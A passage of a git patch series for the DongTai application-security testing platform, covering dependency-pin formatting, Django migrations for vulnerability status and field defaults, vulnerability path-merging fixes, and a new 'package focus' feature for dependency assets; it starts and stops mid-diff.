python_version >= '3' +mypy==1.0.1 +mypy-extensions==1.0.0 ; python_version >= '3.5' +mysqlclient==2.2.0 networkit==10.1 -numpy==1.25.2; python_version >= '3.9' +networkx[all]==3.1 +numpy==1.25.2 ; python_version >= '3.9' odfpy==1.4.1 -openpyxl==3.0.9; python_version >= '3.6' +openpyxl==3.0.9 oss2==2.13.1 -packaging==21.3; python_version >= '3.6' +packaging==21.3 pep8==1.7.1 -pillow==9.3.0; python_version >= '3.7' -prometheus-client==0.17.1; python_version >= '3.6' -prompt-toolkit==3.0.39; python_full_version >= '3.7.0' -pycodestyle==2.11.0; python_version >= '3.8' +pillow==9.3.0 +prometheus-client==0.17.1 ; python_version >= '3.6' +prompt-toolkit==3.0.39 ; python_full_version >= '3.7.0' +pycodestyle==2.11.0 ; python_version >= '3.8' pycparser==2.21 -pycryptodome==3.18.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -pycryptodomex==3.14.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -pydantic==1.10.12; python_version >= '3.7' -pymysql==1.0.2; python_version >= '3.6' -pyparsing==3.1.1; python_full_version >= '3.6.8' -pyre2==0.3.6; python_version >= '3.6' -pyrsistent==0.19.1; python_version >= '3.7' +pycryptodome==3.18.0 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +pycryptodomex==3.14.1 +pydantic==1.10.12 ; python_version >= '3.7' +pymysql==1.0.2 +pyparsing==3.1.1 ; python_full_version >= '3.6.8' +pyre2==0.3.6 +pyrsistent==0.19.1 python-crontab==3.0.0 -python-dateutil==2.8.2; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +python-dateutil==2.8.2 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' python-docx==0.8.11 -python-json-logger==2.0.7; python_version >= '3.6' +python-json-logger==2.0.7 pytz==2022.6 -pyyaml==6.0.1; python_version >= '3.6' -redis==4.4.4; python_version >= '3.7' -requests==2.31.0; python_version >= '3.7' -result==0.8.0; python_version >= '3.7' -s3transfer==0.6.2; python_version >= '3.7' -scipy==1.11.2; python_version < '3.13' and python_version >= '3.9' -setuptools==65.5.1; python_version >= '3.7' -shortuuid==1.0.11; python_version >= '3.5' +pyyaml==6.0.1 ; python_version >= '3.6' +redis==4.4.4 +requests==2.31.0 +result==0.8.0 +s3transfer==0.6.2 ; python_version >= '3.7' +scipy==1.11.2 ; python_version < '3.13' and python_version >= '3.9' +setuptools==65.5.1 +shortuuid==1.0.11 simhash==2.1.2 -six==1.15.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' -sqlparse==0.4.4; python_version >= '3.5' -tablib[html,ods,xls,xlsx,yaml]==3.5.0; python_version >= '3.8' -tomli==2.0.1; python_version < '3.11' -tornado==6.3.3; python_version >= '3.8' -types-awscrt==0.19.0; python_version >= '3.7' and python_version < '4.0' +six==1.15.0 +sqlparse==0.4.4 ; python_version >= '3.5' +tablib[html,ods,xls,xlsx,yaml]==3.5.0 ; python_version >= '3.8' +tomli==2.0.1 ; python_version < '3.11' +tornado==6.3.3 ; python_version >= '3.8' +types-awscrt==0.19.0 ; python_version >= '3.7' and python_version < '4.0' types-pymysql==1.1.0.1 types-pyopenssl==23.2.0.2 types-python-dateutil==2.8.19.14 @@ -132,18 +133,18 @@ types-pytz==2023.3.0.1 types-pyyaml==6.0.12.11 types-redis==4.6.0.5 types-requests==2.31.0.2 -types-s3transfer==0.6.2; python_version >= '3.7' and python_version < '4.0' +types-s3transfer==0.6.2 ; python_version >= '3.7' and python_version < '4.0' types-urllib3==1.26.25.14 -typing-extensions==4.7.1; python_version >= '3.7' +typing-extensions==4.7.1 typing-inspect==0.9.0 -tzdata==2023.3; python_version >= '2' -uritemplate==4.1.1; python_version >= '3.6' -urllib3==1.26.5; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4' -uwsgi==2.0.21 +tzdata==2023.3 ; python_version >= '2' +uritemplate==4.1.1 ; python_version >= '3.6' +urllib3==1.26.5 +uwsgi==2.0.22 uwsgitop==0.11 -vine==5.0.0; python_version >= '3.6' +vine==5.0.0 ; python_version >= '3.6' wcwidth==0.2.6 xlrd==2.0.1 xlwt==1.3.0 -zope.event==5.0; python_version >= '3.7' -zope.interface==6.0; python_version >= '3.7' +zope.event==5.0 ; python_version >= '3.7' +zope.interface==6.0 ; python_version >= '3.7' From 373279967c69ef82519fe960962a61fa858b5dae Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 28 Aug 2023 19:08:26 +0800 Subject: [PATCH 032/114] deps: add networkx --- dongtai_common/engine/vul_engine.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 409fb4c3d..a7366d222 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -195,7 +195,7 @@ def search(self, method_pool, vul_method_signature, vul_type=None): == 0 ): continue - total_path_list.append(total_path) + total_path_list.append(total_path) final_path = [] for path in total_path_list: find_index = None From 3f7639af0f4cecc552671302836188005cebaffc Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 29 Aug 2023 10:09:23 +0800 Subject: [PATCH 033/114] deps: add networkx --- dongtai_common/engine/vul_engine.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index a7366d222..e97db3691 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -194,8 +194,7 @@ def search(self, method_pool, vul_method_signature, vul_type=None): ) == 0 ): - continue - total_path_list.append(total_path) + total_path_list.append(total_path) final_path = [] for path in total_path_list: find_index = None From 0191871c0d739b2a7746c4d262ffc23e5a26d95d Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 29 Aug 2023 10:22:55 +0800 Subject: [PATCH 034/114] deps: add networkx --- dongtai_common/engine/vul_engine.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index e97db3691..ef2e40448 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -181,7 +181,6 @@ def search(self, method_pool, vul_method_signature, vul_type=None): if nk.has_path(g, s, t): path = nk.shortest_path(g, s, t, weight="weight") total_path = path - total_path_list.append(total_path) if ( len(total_path) > 1 and "targetRange" in invokeid_dict[total_path[-2]] @@ -194,7 +193,8 @@ def search(self, method_pool, vul_method_signature, vul_type=None): ) == 0 ): - total_path_list.append(total_path) + continue + total_path_list.append(total_path) final_path = [] for path in total_path_list: find_index = None From dbe304a5890860001b8fa88a0341631886edd4dd Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 29 Aug 2023 10:28:26 +0800 Subject: [PATCH 035/114] feat: modify vul save logic --- dongtai_common/migrations/0015_vul_status.py | 18 ++++++++++++++++++ dongtai_common/utils/const.py | 2 +- dongtai_engine/signals/handlers/vul_handler.py | 13 +++++++++++++ 3 files changed, 32 insertions(+), 1 deletion(-) create mode 100644 dongtai_common/migrations/0015_vul_status.py diff --git a/dongtai_common/migrations/0015_vul_status.py b/dongtai_common/migrations/0015_vul_status.py new file mode 100644 index 000000000..19f79dba0 --- /dev/null +++ b/dongtai_common/migrations/0015_vul_status.py @@ -0,0 +1,18 @@ +from django.db import migrations + + +def update_vul_status(apps, schema_editor): + # We can't import the Person model directly as it may be a newer + # version than this migration expects. We use the historical version. + IastVulnerabilityStatus = apps.get_model("dongtai_common", "IastVulnerabilityStatus") + IastVulnerabilityStatus(id=7, name="已忽略", name_zh="已忽略", name_en="Ignored").save() + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0014_auto_20230828_1132"), + ] + + operations = [ + migrations.RunPython(update_vul_status), + ] diff --git a/dongtai_common/utils/const.py b/dongtai_common/utils/const.py index 834f10819..2b6a7eacd 100644 --- a/dongtai_common/utils/const.py +++ b/dongtai_common/utils/const.py @@ -84,8 +84,8 @@ VUL_PENDING = 1 VUL_VERIFYING = 2 VUL_CONFIRMED = 3 -VUL_IGNORE = 4 VUL_SOLVED = 5 +VUL_IGNORE = 6 # API 操作 tag diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index 60a43b7e8..df013e058 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -266,6 +266,17 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac is_api_cached = uuid_key != cache.get_or_set(cache_key, uuid_key) if is_api_cached: return None + + if IastVulnerabilityModel.objects.filter( + strategy_id=strategy_id, + pattern_uri=pattern_uri, + http_method=vul_meta.http_method, + project_id=vul_meta.agent.bind_project_id, + param_name=param_name, + status_id=const.VUL_IGNORE, + ).exists(): + return None + # 获取 相同项目版本下的数据 vul = ( IastVulnerabilityModel.objects.filter( @@ -300,6 +311,7 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac vul.method_pool_id = vul_meta.id vul.language = vul_meta.agent.language vul.full_stack = json.dumps(vul_stack, ensure_ascii=False) + vul.is_del = 0 vul.save( update_fields=[ "url", @@ -320,6 +332,7 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac "latest_time", "latest_time_desc", "language", + "is_del", ] ) else: From 8750f3d88ab4c455e8e5f26fb2dda56a916a2a5c Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 29 Aug 2023 10:51:43 +0800 Subject: [PATCH 036/114] deps: add networkx --- dongtai_common/engine/vul_engine.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index ef2e40448..0cd74ce0e 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -200,7 +200,7 @@ def search(self, method_pool, vul_method_signature, vul_type=None): find_index = None # Merge if path take same node for ind, target_path in enumerate(final_path): - if set(path[1:]) & set(target_path[1:]): + if set(path[1:]) & set(target_path[1:]) and path[-1] == target_path[-1]: find_index = ind break if find_index is not None: From 68d279161620b0759087d57b2a6d942d7fec4ba2 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 29 Aug 2023 10:56:05 +0800 Subject: [PATCH 037/114] deps: add networkx --- dongtai_common/engine/vul_engine.py | 1 - 1 file changed, 1 deletion(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 0cd74ce0e..514717857 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -2,7 +2,6 @@ # datetime: 2021/7/21 下午7:07 import copy import logging -import sys from collections import defaultdict from django.utils.functional import cached_property From 716902e2948d85c494272fcb553bc01b91579a4a Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 29 Aug 2023 14:01:58 +0800 Subject: [PATCH 038/114] feat: modify vul save logic --- .../migrations/0016_auto_20230829_1145.py | 59 +++++++++++++++++++ dongtai_common/models/vulnerablity.py | 23 ++++---- 2 files changed, 71 insertions(+), 11 deletions(-) create mode 100644 dongtai_common/migrations/0016_auto_20230829_1145.py diff --git a/dongtai_common/migrations/0016_auto_20230829_1145.py b/dongtai_common/migrations/0016_auto_20230829_1145.py new file mode 100644 index 000000000..937c6d45c --- /dev/null +++ b/dongtai_common/migrations/0016_auto_20230829_1145.py @@ -0,0 +1,59 @@ +# Generated by Django 3.2.20 on 2023-08-29 11:45 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0015_vul_status"), + ] + + operations = [ + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="bottom_stack", + field=models.CharField(blank=True, default="", max_length=255), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="full_stack", + field=models.TextField(blank=True, default=""), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="language", + field=models.CharField(blank=True, default="", max_length=10), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="param_name", + field=models.CharField(blank=True, default="", max_length=255), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="pattern_uri", + field=models.CharField(blank=True, default="", max_length=255), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="taint_position", + field=models.CharField(blank=True, default="", max_length=255), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="taint_value", + field=models.CharField(blank=True, default="", max_length=255), + ), + migrations.AlterField( + model_name="iastvulnerabilitymodel", + name="top_stack", + field=models.CharField(blank=True, default="", max_length=255), + ), + migrations.AddIndex( + model_name="iastvulnerabilitymodel", + index=models.Index( + fields=["http_method", "param_name", "pattern_uri", "project_id", "status_id", "strategy_id"], + name="iast_vulner_http_me_f84d4f_idx", + ), + ), + ] diff --git a/dongtai_common/models/vulnerablity.py b/dongtai_common/models/vulnerablity.py index 0ecb65e6c..390d35edd 100644 --- a/dongtai_common/models/vulnerablity.py +++ b/dongtai_common/models/vulnerablity.py @@ -34,7 +34,7 @@ class IastVulnerabilityModel(models.Model): level = models.ForeignKey(IastVulLevel, models.DO_NOTHING, blank=True) url = models.CharField(max_length=2000, blank=True) uri = models.CharField(max_length=255, blank=True) - pattern_uri = models.CharField(max_length=255, blank=True, null=True) + pattern_uri = models.CharField(max_length=255, blank=True, default="") # 模糊搜索 全文索引 查询 vul_title = models.CharField(max_length=255, blank=True, default="") http_method = models.CharField(max_length=10, blank=True) @@ -42,18 +42,16 @@ class IastVulnerabilityModel(models.Model): http_protocol = models.CharField(max_length=255, blank=True) req_header = models.TextField(blank=True) req_params = models.CharField(max_length=2000, blank=True, default="") - req_data = models.TextField( - blank=True, - ) + req_data = models.TextField(blank=True) res_header = models.TextField(blank=True) res_body = models.TextField(blank=True) - full_stack = models.TextField(blank=True, null=True) - top_stack = models.CharField(max_length=255, blank=True, null=True) - bottom_stack = models.CharField(max_length=255, blank=True, null=True) - taint_value = models.CharField(max_length=255, blank=True, null=True) - taint_position = models.CharField(max_length=255, blank=True, null=True) + full_stack = models.TextField(blank=True, default="") + top_stack = models.CharField(max_length=255, blank=True, default="") + bottom_stack = models.CharField(max_length=255, blank=True, default="") + taint_value = models.CharField(max_length=255, blank=True, default="") + taint_position = models.CharField(max_length=255, blank=True, default="") agent = models.ForeignKey(IastAgent, models.DO_NOTHING, blank=True) - language = models.CharField(max_length=10, blank=True, null=True) + language = models.CharField(max_length=10, blank=True, default="") context_path = models.CharField(max_length=255, blank=True) counts = models.IntegerField(blank=True) first_time = models.IntegerField(blank=True) @@ -61,7 +59,7 @@ class IastVulnerabilityModel(models.Model): latest_time_desc = models.IntegerField(blank=True, default=0) level_id_desc = models.SmallIntegerField(blank=True, default=0) client_ip = models.CharField(max_length=255, blank=True) - param_name = models.CharField(max_length=255, blank=True, null=True) + param_name = models.CharField(max_length=255, blank=True, default="") is_del = models.SmallIntegerField(blank=True, default=0) method_pool_id = models.IntegerField(default=-1, blank=True) strategy = models.ForeignKey( @@ -90,6 +88,9 @@ class IastVulnerabilityModel(models.Model): class Meta: managed = get_managed() db_table = "iast_vulnerability" + indexes = [ + models.Index(fields=("http_method", "param_name", "pattern_uri", "project_id", "status_id", "strategy_id")), + ] def save(self, *args, **kwargs): key_works = [ From 8f6a3c765e24a2f368510c8ced7b2aa34a0e6b36 Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 29 Aug 2023 14:17:29 +0800 Subject: [PATCH 039/114] feat: modify vul save logic --- dongtai_engine/plugins/strategy_headers.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/dongtai_engine/plugins/strategy_headers.py b/dongtai_engine/plugins/strategy_headers.py index bb174ad2d..7c5bd2cc7 100644 --- a/dongtai_engine/plugins/strategy_headers.py +++ b/dongtai_engine/plugins/strategy_headers.py @@ -206,9 +206,9 @@ def save_vul(vul_type, method_pool, position=None, data=None): req_data=method_pool.req_data, res_header=method_pool.res_header, res_body=method_pool.res_body, - full_stack=None, - top_stack=None, - bottom_stack=None, + full_stack="", + top_stack="", + bottom_stack="", taint_value=data, taint_position=position, agent=method_pool.agent, @@ -218,7 +218,7 @@ def save_vul(vul_type, method_pool, position=None, data=None): first_time=method_pool.create_time, latest_time=timestamp, client_ip=method_pool.clent_ip, - param_name=None, + param_name="", method_pool_id=method_pool.id, project_version_id=method_pool.agent.project_version_id, project_id=method_pool.agent.bind_project_id, From 8ef1f459215d3329ca1b8776a423b574c93f1b51 Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 29 Aug 2023 14:26:41 +0800 Subject: [PATCH 040/114] feat: modify vul save logic --- dongtai_engine/plugins/strategy_headers.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_engine/plugins/strategy_headers.py b/dongtai_engine/plugins/strategy_headers.py index 7c5bd2cc7..2b8c0a9ba 100644 --- a/dongtai_engine/plugins/strategy_headers.py +++ b/dongtai_engine/plugins/strategy_headers.py @@ -121,7 +121,7 @@ def check_response_header(method_pool): ) -def save_vul(vul_type, method_pool, position=None, data=None): +def save_vul(vul_type, method_pool, position="", data=""): if is_strategy_enable(vul_type, method_pool) is False: return vul_strategy = IastStrategyModel.objects.filter( From c7b65ec63a1db431bcf503f82ae8c66ebd5fadc2 Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 29 Aug 2023 14:57:58 +0800 Subject: [PATCH 041/114] fix: vul method pool error --- .../0017_alter_vulmethodpool_pool_sign.py | 17 +++++++++++++++++ dongtai_common/models/agent_method_pool.py | 2 +- 2 files changed, 18 insertions(+), 1 deletion(-) create mode 100644 dongtai_common/migrations/0017_alter_vulmethodpool_pool_sign.py diff --git a/dongtai_common/migrations/0017_alter_vulmethodpool_pool_sign.py b/dongtai_common/migrations/0017_alter_vulmethodpool_pool_sign.py new file mode 100644 index 000000000..c817b0a33 --- /dev/null +++ b/dongtai_common/migrations/0017_alter_vulmethodpool_pool_sign.py @@ -0,0 +1,17 @@ +# Generated by Django 3.2.20 on 2023-08-29 14:57 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0016_auto_20230829_1145"), + ] + + operations = [ + migrations.AlterField( + model_name="vulmethodpool", + name="pool_sign", + field=models.CharField(blank=True, max_length=40), + ), + ] diff --git a/dongtai_common/models/agent_method_pool.py b/dongtai_common/models/agent_method_pool.py index c0e8a3932..aa5e24619 100644 --- a/dongtai_common/models/agent_method_pool.py +++ b/dongtai_common/models/agent_method_pool.py @@ -67,7 +67,7 @@ class VulMethodPool(models.Model): req_header_fs = models.TextField(db_column="req_header_for_search") context_path = models.CharField(max_length=255, blank=True, null=True) method_pool = models.TextField() # This field type is a guess. - pool_sign = models.CharField(unique=True, blank=True, max_length=40) # This field type is a guess. + pool_sign = models.CharField(blank=True, max_length=40) # This field type is a guess. clent_ip = models.CharField(max_length=255, blank=True) create_time = models.IntegerField() update_time = models.IntegerField() From cf652d4b99423a137d42bae65a3d6e26e022e118 Mon Sep 17 00:00:00 2001 From: st1020 Date: Tue, 29 Aug 2023 16:38:49 +0800 Subject: [PATCH 042/114] feat: add has vul method pool field --- dongtai_web/aggr_vul/app_vul_list.py | 3 +++ dongtai_web/views/vul_details.py | 2 ++ 2 files changed, 5 insertions(+) diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index e5cc70fc8..3157ef330 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -13,6 +13,7 @@ from dongtai_common.common.utils import make_hash from dongtai_common.endpoint import R, UserEndPoint from dongtai_common.models import APP_LEVEL_RISK, APP_VUL_ORDER +from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.dast_integration import IastDastIntegrationRelation from dongtai_common.models.vulnerablity import ( IastVulnerabilityDocument, @@ -177,6 +178,7 @@ def post(self, request): lambda: 0, {item["iastvul_id"]: item["dastvul_count"] for item in dastvul_rel_count_res}, ) + has_vul_method_pool_set = set(VulMethodPool.objects.filter(vul_id__in=vul_ids).values_list("vul_id", flat=True)) if vul_data: for item in vul_data: item["level_name"] = APP_LEVEL_RISK.get(str(item["level_id"]), "") @@ -190,6 +192,7 @@ def post(self, request): item["dastvul__vul_type"] = dast_vul_types_dict[item["id"]] item["dastvul_count"] = dastvul_rel_count_res_dict[item["id"]] item["dast_validation_status"] = bool(dastvul_rel_count_res_dict[item["id"]]) + item["has_vul_method_pool"] = item["id"] in has_vul_method_pool_set end["data"].append(item) # all Iast Vulnerability Status status = IastVulnerabilityStatus.objects.all() diff --git a/dongtai_web/views/vul_details.py b/dongtai_web/views/vul_details.py index 068c70c5f..7e483399e 100644 --- a/dongtai_web/views/vul_details.py +++ b/dongtai_web/views/vul_details.py @@ -9,6 +9,7 @@ from rest_framework import serializers from dongtai_common.endpoint import R, UserEndPoint +from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.hook_type import HookType from dongtai_common.models.project import IastProject from dongtai_common.models.project_version import IastProjectVersion @@ -327,6 +328,7 @@ def get_vul(self, projects): "method_pool_id": vul.method_pool_id, "project_id": project_id, "is_need_http_detail": is_need_http_detail(strategy_name), + "has_vul_method_pool": VulMethodPool.objects.filter(vul_id=vul.id).exists(), } def get_strategy(self): From 68f4599378ae2f108d3b59a1a184517bc6cfeafb Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 30 Aug 2023 10:00:35 +0800 Subject: [PATCH 043/114] fix: iast_vulnerability table migration --- dongtai_common/migrations/0016_auto_20230829_1145.py | 2 +- dongtai_common/models/vulnerablity.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_common/migrations/0016_auto_20230829_1145.py b/dongtai_common/migrations/0016_auto_20230829_1145.py index 937c6d45c..05051936d 100644 --- a/dongtai_common/migrations/0016_auto_20230829_1145.py +++ b/dongtai_common/migrations/0016_auto_20230829_1145.py @@ -42,7 +42,7 @@ class Migration(migrations.Migration): migrations.AlterField( model_name="iastvulnerabilitymodel", name="taint_value", - field=models.CharField(blank=True, default="", max_length=255), + field=models.CharField(blank=True, default="", max_length=4000), ), migrations.AlterField( model_name="iastvulnerabilitymodel", diff --git a/dongtai_common/models/vulnerablity.py b/dongtai_common/models/vulnerablity.py index 390d35edd..ebfc123f5 100644 --- a/dongtai_common/models/vulnerablity.py +++ b/dongtai_common/models/vulnerablity.py @@ -48,7 +48,7 @@ class IastVulnerabilityModel(models.Model): full_stack = models.TextField(blank=True, default="") top_stack = models.CharField(max_length=255, blank=True, default="") bottom_stack = models.CharField(max_length=255, blank=True, default="") - taint_value = models.CharField(max_length=255, blank=True, default="") + taint_value = models.CharField(max_length=4000, blank=True, default="") taint_position = models.CharField(max_length=255, blank=True, default="") agent = models.ForeignKey(IastAgent, models.DO_NOTHING, blank=True) language = models.CharField(max_length=10, blank=True, default="") From c56a957bba2f086aa908768a5b42d09470a6562b Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 30 Aug 2023 11:06:24 +0800 Subject: [PATCH 044/114] feat: package focus --- .../migrations/0018_auto_20230830_1105.py | 29 +++++++++++++++++++ dongtai_common/models/assetv2.py | 1 + dongtai_common/models/package_focus.py | 11 +++++++ dongtai_web/dongtai_sca/scan/tasks.py | 9 ++++++ 4 files changed, 50 insertions(+) create mode 100644 dongtai_common/migrations/0018_auto_20230830_1105.py create mode 100644 dongtai_common/models/package_focus.py diff --git a/dongtai_common/migrations/0018_auto_20230830_1105.py b/dongtai_common/migrations/0018_auto_20230830_1105.py new file mode 100644 index 000000000..c40b6e472 --- /dev/null +++ b/dongtai_common/migrations/0018_auto_20230830_1105.py @@ -0,0 +1,29 @@ +# Generated by Django 3.2.20 on 2023-08-30 11:05 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0017_alter_vulmethodpool_pool_sign"), + ] + + operations = [ + migrations.CreateModel( + name="IastPackageFocus", + fields=[ + ("id", models.BigAutoField(primary_key=True, serialize=False)), + ("language_id", models.IntegerField()), + ("package_name", models.CharField(max_length=255)), + ("package_version", models.CharField(blank=True, default="", max_length=255)), + ], + options={ + "db_table": "iast_package_focus", + }, + ), + migrations.AddField( + model_name="assetv2global", + name="is_focus", + field=models.BooleanField(default=False), + ), + ] diff --git a/dongtai_common/models/assetv2.py b/dongtai_common/models/assetv2.py index 84dc22d3b..8a63a6621 100644 --- a/dongtai_common/models/assetv2.py +++ b/dongtai_common/models/assetv2.py @@ -75,6 +75,7 @@ class AssetV2Global(models.Model): license_list = models.JSONField(blank=True, default=list) language_id = models.IntegerField(default=1, blank=True) aql = models.CharField(max_length=255, blank=True, unique=True) + is_focus = models.BooleanField(default=False) class Meta: managed = get_managed() diff --git a/dongtai_common/models/package_focus.py b/dongtai_common/models/package_focus.py new file mode 100644 index 000000000..3d6eca256 --- /dev/null +++ b/dongtai_common/models/package_focus.py @@ -0,0 +1,11 @@ +from django.db import models + + +class IastPackageFocus(models.Model): + id = models.BigAutoField(primary_key=True) + language_id = models.IntegerField() + package_name = models.CharField(max_length=255) + package_version = models.CharField(max_length=255, blank=True, default="") + + class Meta: + db_table = "iast_package_focus" diff --git a/dongtai_web/dongtai_sca/scan/tasks.py b/dongtai_web/dongtai_sca/scan/tasks.py index bffe4ceea..7ae2697c8 100644 --- a/dongtai_web/dongtai_sca/scan/tasks.py +++ b/dongtai_web/dongtai_sca/scan/tasks.py @@ -7,6 +7,7 @@ from celery import shared_task from django.db import IntegrityError +from django.db.models import Q from dongtai_common.models.agent import IastAgent from dongtai_common.models.asset import Asset @@ -18,7 +19,9 @@ IastVulAssetRelation, IastVulLevel, ) +from dongtai_common.models.package_focus import IastPackageFocus from dongtai_conf.settings import SCA_SETUP +from dongtai_protocol.views.hook_profiles import LANGUAGE_DICT from dongtai_web.dongtai_sca.common.dataclass import VulInfo from .cwe import get_cwe_name @@ -276,6 +279,11 @@ def new_update_one_sca( else: packages = get_package_v3(aql=package_name) asset_license_list = [] + is_focus = IastPackageFocus.objects.filter( + Q(package_version=package_version) | Q(package_name=package_name, package_version=""), + language_id=LANGUAGE_DICT.get(agent.language, None), + package_name=package_name, + ).exists() for package in packages: aql = get_package_aql(package.name, package.ecosystem, package.version) license_list = get_license_list_v2(package.license) @@ -297,6 +305,7 @@ def new_update_one_sca( "signature_value": package.hash, "version": package.version, "license_list": license_list, + "is_focus": is_focus, }, ) AssetV2.objects.update_or_create( From 590373f4942aad7d58f2e3ed90ce1fb4c5ab60d5 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 30 Aug 2023 11:40:02 +0800 Subject: [PATCH 045/114] feat: package focus --- dongtai_web/dongtai_sca/scan/tasks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_web/dongtai_sca/scan/tasks.py b/dongtai_web/dongtai_sca/scan/tasks.py index 7ae2697c8..7ca4a1f65 100644 --- a/dongtai_web/dongtai_sca/scan/tasks.py +++ b/dongtai_web/dongtai_sca/scan/tasks.py @@ -280,7 +280,7 @@ def new_update_one_sca( packages = get_package_v3(aql=package_name) asset_license_list = [] is_focus = IastPackageFocus.objects.filter( - Q(package_version=package_version) | Q(package_name=package_name, package_version=""), + Q(package_version=package_version) | Q(package_version=""), language_id=LANGUAGE_DICT.get(agent.language, None), package_name=package_name, ).exists() From d4a0c97aa22e114d930ed6617cc2726dd6d32c24 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 30 Aug 2023 16:00:08 +0800 Subject: [PATCH 046/114] feat: focus package priority --- dongtai_common/serializers/assetv2.py | 1 + dongtai_web/dongtai_sca/views/newpackage.py | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/dongtai_common/serializers/assetv2.py b/dongtai_common/serializers/assetv2.py index 4ef704d39..e0c5c8879 100644 --- a/dongtai_common/serializers/assetv2.py +++ b/dongtai_common/serializers/assetv2.py @@ -38,6 +38,7 @@ class Meta: "aql", "language", "vul_count_groupby_level", + "is_focus", ] def get_language(self, obj) -> str: diff --git a/dongtai_web/dongtai_sca/views/newpackage.py b/dongtai_web/dongtai_sca/views/newpackage.py index dbdf9a47f..dbcd2a57a 100644 --- a/dongtai_web/dongtai_sca/views/newpackage.py +++ b/dongtai_web/dongtai_sca/views/newpackage.py @@ -49,6 +49,7 @@ class Meta: "language_id", "aql", "vul_count_groupby_level", + "is_focus", ] @@ -84,7 +85,7 @@ def post(self, request): q = q & Q(aql__contains=ser.validated_data["keyword"]) order = ("-" if ser.validated_data["order"] == "desc" else "") + ser.validated_data["order_field"] page_info, data = self.get_paginator( - AssetV2Global.objects.filter(q).order_by(order).all(), + AssetV2Global.objects.filter(q).order_by("-is_focus", order).all(), ser.validated_data["page"], ser.validated_data["page_size"], ) From 802834332423d027cd062b2566f53ba3620ed8cd Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 30 Aug 2023 16:39:18 +0800 Subject: [PATCH 047/114] feat: focus package priority --- ...tv2global_iast_asset__is_focu_31e975_idx.py | 18 ++++++++++++++++++ dongtai_common/models/assetv2.py | 1 + 2 files changed, 19 insertions(+) create mode 100644 dongtai_common/migrations/0019_assetv2global_iast_asset__is_focu_31e975_idx.py diff --git a/dongtai_common/migrations/0019_assetv2global_iast_asset__is_focu_31e975_idx.py b/dongtai_common/migrations/0019_assetv2global_iast_asset__is_focu_31e975_idx.py new 